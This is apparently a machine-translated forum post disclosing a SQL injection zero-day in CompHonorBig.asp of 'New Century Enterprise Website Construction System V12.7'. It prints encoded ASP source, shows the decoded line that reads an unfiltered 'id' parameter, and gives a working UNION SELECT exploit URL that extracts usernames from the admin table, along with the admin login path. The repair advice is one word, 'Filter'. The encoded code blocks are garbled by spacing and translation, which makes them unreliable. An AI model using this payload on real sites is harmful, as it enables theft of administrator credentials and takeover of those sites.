New Century Enterprise Website Construction System V12.7 injection ODAY and repair

Legend of the wind

Affected Version: V12.7
Vulnerability Type: SQL Injection
Vulnerability file: CompHonorBig. asp

You can see a piece of code encryption:

<% @ LANGUAGE = VBScript. Encode %>

<! -- # Include file = "Inc/conn. asp" -->

<% #@~ ^ JgAAAA = [B :~ BN # @ & k9Mn ;! + DYcp; nMX? D. k o 'rr [J * bgwAAA = ^ #~ @ %>

<Html>

<Head>

<Title> image </title>

<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">

<% #@~ ^ CAAAAA ==##&/nDPM/k + M-+ MR/D lOn} 4L ^ YvJl9G [4cD mGD [d YE ###@ & DkRG2 xPEd VnmD ~ CPWMWsPZK: auW W. PStn. Pk9xJLkNB ^ Gx ~ 8 ~ Q ##@ & MyMAAA = ^ #~ @ %>

<% #@~ ^ 6 gAAAA = r6POMks 'dk 'r/WswuWW. E *#@! @ * EJ, Yt U # @ & iP, Dn/2G/nRS. kD ++ ~ E @! Nk -~ MVro xEmn y db @*@! Bho,/. m {JOMk: v./vJZKh2CKxKDE # brP8WM [+ MT ~ @*@! Z [r7 @ * E @ # @ & n ^/n @ # @ & iPPM + k2W/nRqDrO PJ @! R: TP/M ^ xksoJxGwr ^ cL2o, Ak9Y4x + * P4nbo4Y {1 + PC ^ Y {No picture now! @ * J @ # @ & UN, kWu0IAAA = ^ #~ @ %>

<Div align = "center"> <BR>

<BR "> % = #@~ ^ EwAAAA = OMkhvDk 'J 6 aslbxE # * eAYAAA = ^ #~ @ %> <BR>

</Div>

<Mailto: % #@~ ^ IgAAAA ==##@ & Ddcm ^ W/# @ & d + DP./{xGO4kxT #@ & 8 wgAAA == #~ @>

</Body>

</Html>
 

So I'm curious, the rest are not encrypted. Why is this file encrypted ~! I looked at other codes and added the anti-injection Code, which does not seem to have been called.
As a result, I decrypted it: ODAY also followed. Haha ~! After decryption:

<% @ LANGUAGE = VBScript %> <! -- # Include file = "Inc/conn. asp "--> <% dim id = request. queryString ("id ") %> // receive the ID parameter

Add EXP:
Http: // 127.0.0.1/CompHonorBig. asp? Id = 11 union select 1, username, 3,4, 5 from admin

Background
Http: // 127.0.0.1/admin/login. asp

Fix:

Filter